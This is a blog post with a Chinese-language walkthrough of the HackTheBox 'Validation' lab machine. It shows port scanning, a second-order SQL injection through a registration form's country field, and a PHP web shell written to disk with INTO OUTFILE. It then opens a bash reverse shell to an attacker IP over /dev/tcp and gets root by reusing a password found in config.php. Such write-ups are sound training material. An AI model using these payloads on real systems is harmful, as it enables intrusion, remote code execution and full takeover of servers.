HackTheBox-Validation

  • laoxinsec

    2022-08-24 19:09:34
  • 数据库开发技术
  • 原创

title: HackTheBox-Validation-SQLi author: Mosaic Theory layout: true categories: 漏洞实验 tags:

  • • 打靶日记

Stars are bright everywhere, depending on whether you look up to see them.

星星在哪里都是很亮的,就看你有没有抬头去看他们。

HackTheBox-Validation

Recon:

Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-05-17 01:08:15 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4566/tcp on 10.10.11.116                                  
Discovered open port 80/tcp on 10.10.11.116                                    
Discovered open port 22/tcp on 10.10.11.116                                    
Discovered open port 8080/tcp on 10.10.11.116 
Nmap scan report for 10.10.11.116
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open  http    Apache httpd 2.4.48 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.48 (Debian)
4566/tcp open  http    nginx
|_http-title: 403 Forbidden
8080/tcp open  http    nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds

一个注册页面:

添加之后会回显在页面:

如果在同一个地点添加不一样的用户名也会回显:

>> dirsearch -u http://validation.htb/ -e php

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 30 | Wordlist size: 8940
[09:18:48] 403 -  279B  - /.htpasswds
[09:18:48] 403 -  279B  - /.httr-oauth
[09:18:49] 403 -  279B  - /.htpasswd_test
[09:19:01] 200 -   16B  - /account.php
[09:19:14] 200 -    0B  - /config.php
[09:19:17] 301 -  314B  - /css  ->  http://validation.htb/css/
[09:19:25] 200 -   16KB - /index.php
[09:19:25] 200 -   16KB - /index.php/login/
[09:19:26] 403 -  279B  - /js/
[09:19:26] 301 -  313B  - /js  ->  http://validation.htb/js/

config读取不出来,login与index一样,只是没有了渲染。

POST / HTTP/1.1
Host: validation.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://validation.htb
DNT: 1
Connection: close
Referer: http://validation.htb/
Cookie: user=ca28b722bc10aa4b3beb941d5ca220ca
Upgrade-Insecure-Requests: 1

username=admin&country=Brazil

SQLi:

无论如何更改参数服务器都会响应一个set cookie,如果在Country后边添加一个单引号,服务器一样会返回一个cookie,但是如果用它返回的cookie当作用户名,服务端会返回一些报错信息:

    div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome 21232f297a57a5a743894a0e4a801fc3'h1><h3 class="text-white">Other Players In Brazil'h3><br />
<b>Fatal errorb>:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in <b>/var/www/html/account.phpb> on line <b>33

为验证这个猜想,我在单引号后边又添加了注释:

>> curl -v -d "username=hack&country=Brazil'-- -" http://validation.htb            
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 32
> Content-Type: application/x-www-form-urlencoded

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:49:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> GET /account.php HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34

* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 17 May 2022 01:50:54 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Vary: Accept-Encoding
< Content-Length: 762
< Content-Type: text/html; charset=UTF-8







        Join the UHC - September Qualifiers
        
    

    
        
            Welcome hackOther Players In Brazil'-- mosaicmosaicdadmin  

    

* Connection #0 to host validation.htb left intact

这次并没有报错,这似乎是一个二次注入:

>> curl -v -d "username=hack&country=Brazil'union select 1--+" http://validation.htb
*   Trying 10.10.11.116:80...
* Connected to validation.htb (10.10.11.116) port 80 (#0)
> POST / HTTP/1.1
> Host: validation.htb
> User-Agent: curl/7.83.0
> Accept: */*
> Content-Length: 46
> Content-Type: application/x-www-form-urlencoded

* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Tue, 17 May 2022 01:55:16 GMT
< Server: Apache/2.4.48 (Debian)
< X-Powered-By: PHP/7.4.23
< Set-Cookie: user=d78b6f30225cdc811adfe8d4e7c9fd34
< Location: /account.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8

* Connection #0 to host validation.htb left intact
>> curl -v --cookie "user=21232f297a57a5a743894a0e4a801fc3" http://validation.htb/account.php
<link href="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.1.1/js/bootstrap.min.js">script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js">script>


<div class="container">
        <h1 class="text-center m-5">Join the UHC - September Qualifiersh1>
        
    div>
    <section class="bg-dark text-center p-5 mt-4">
        <div class="container p-5">
            <h1 class="text-white">Welcome adminh1><h3 class="text-white">Other Players In Belgium' union select 1-- -h3><li class='text-white'>1li>div>
    section>
div>
* Connection #0 to host validation.htb left intact

看起来有回显。

>> curl -v -d "username=hack&country=Brazil'union select user()--+" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
"container">
        "text-center m-5">Join the UHC - September Qualifiers
        
    
    "bg-dark text-center p-5 mt-4">
        "container p-5">
            "text-white">Welcome hack"text-white">Other Players In Brazil'union select user()-- text-white'>mosaictext-white'>mosaicdtext-white'>uhc@localhost  
    

获取到当前用户:uhc@localhost。

>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php


"container">
        "text-center m-5">Join the UHC - September Qualifiers
        
    
    "bg-dark text-center p-5 mt-4">
        "container p-5">
            "text-white">Welcome hack"text-white">Other Players In Brazil'union select database()-- text-white'>mosaictext-white'>mosaicdtext-white'>registration  
    

* Connection #0 to host validation.htb left intact

当前数据库registration:

>> curl -v -d "username=hack&country=Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = \"'uhc'@'localhost'\"-- -" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
"bg-dark text-center p-5 mt-4">
        "container p-5">
            "text-white">Welcome hack"text-white">Other Players In Brazil'union select privilege_type FROM information_schema.user_privileges where grantee = "'uhc'@'localhost'"-- -text-white'>mosaictext-white'>mosaicdtext-white'>SELECTtext-white'>INSERTtext-white'>UPDATEtext-white'>DELETEtext-white'>CREATEtext-white'>DROPtext-white'>RELOADtext-white'>SHUTDOWNtext-white'>PROCESStext-white'>FILEtext-white'>REFERENCEStext-white'>INDEXtext-white'>ALTERtext-white'>SHOW DATABASEStext-white'>SUPERtext-white'>CREATE TEMPORARY TABLEStext-white'>LOCK TABLEStext-white'>EXECUTEtext-white'>REPLICATION SLAVEtext-white'>BINLOG MONITORtext-white'>CREATE VIEWtext-white'>SHOW VIEWtext-white'>CREATE ROUTINEtext-white'>ALTER ROUTINEtext-white'>CREATE USERtext-white'>EVENTtext-white'>TRIGGERtext-white'>CREATE TABLESPACEtext-white'>DELETE HISTORYtext-white'>SET USERtext-white'>FEDERATED ADMINtext-white'>CONNECTION ADMINtext-white'>READ_ONLY ADMINtext-white'>REPLICATION SLAVE ADMINtext-white'>REPLICATION MASTER ADMINtext-white'>BINLOG ADMINtext-white'>BINLOG REPLAYtext-white'>SLAVE MONITOR  
    

* Connection #0 to host validation.htb left intact

我当前的用户权限很多,而且它拥有File权限:

>> curl -v -d "username=hack&country=Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - " http://validation.htb/
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
"container">
        "text-center m-5">Join the UHC - September Qualifiers
        
    
    "bg-dark text-center p-5 mt-4">
        "container p-5">
            "text-white">Welcome hack"text-white">Other Players In Belgium' union select ' can you see me ?' into outfile '/var/www/html/test.txt'-- - 
Fatal error:  Uncaught Error: Call to a member function fetch_assoc() on bool in /var/www/html/account.php:33
Stack trace:
#0 {main}
  thrown in /var/www/html/account.php on line 33
* Connection #0 to host validation.htb left intact
>> curl http://validation.htb/test.txt                                                       
 can you see me ?
                  

我可以写WebShell,符号太多会出错,可进行编码:

>> curl -v -d "username=hack&country=Belgium' union select %22%3C%3Fphp%20SYSTEM(%24_REQUEST%5B%27cmd%27%5D)%3B%20%3F%3E%22%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Fshell.php%27%3B--%20-" http://validation.htb
>> curl -v --cookie "user=d78b6f30225cdc811adfe8d4e7c9fd34" http://validation.htb/account.php
>> curl http://validation.htb/shell.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell:

>> curl http://validation.htb/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.7/9001 0>&1"'
>> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.116] 40708
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@validation:/var/www/html$
script /dev/null -c bash
^Z
stty raw -echofg
reset
screen

对用户目录有读取权限:

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js  shell.php
www-data@validation:/var/www/html$ cd ~
www-data@validation:/var/www$ ls
html
www-data@validation:/var/www$ cd /
www-data@validation:/$ cd home/
www-data@validation:/home$ ls
htb
www-data@validation:/home$ cd htb/
www-data@validation:/home/htb$ ls
user.txt
www-data@validation:/home/htb$ cat user.txt 
07..................................

在配置文件里有一串密码,uhc用户会提示不存在,但是尝试密码复用root会成功:

www-data@validation:/var/www/html$ ls
account.php  config.php  css  index.php  js
www-data@validation:/var/www/html$ cat config.php 
  $servername = "127.0.0.1";
  $username = "uhc";
  $password = "uhc-9qual-global-pw";
  $dbname = "registration";

  $conn = new mysqli($servername$username$password$dbname);
?>
www-data@validation:/var/www/html$ su uhc
su: user uhc does not exist or the user entry does not contain all the required fields
www-data@validation:/var/www/html$ su -
Password: 
root@validation:~# cat /root/root.txt 
7a..................................


请使用浏览器的分享功能分享到微信等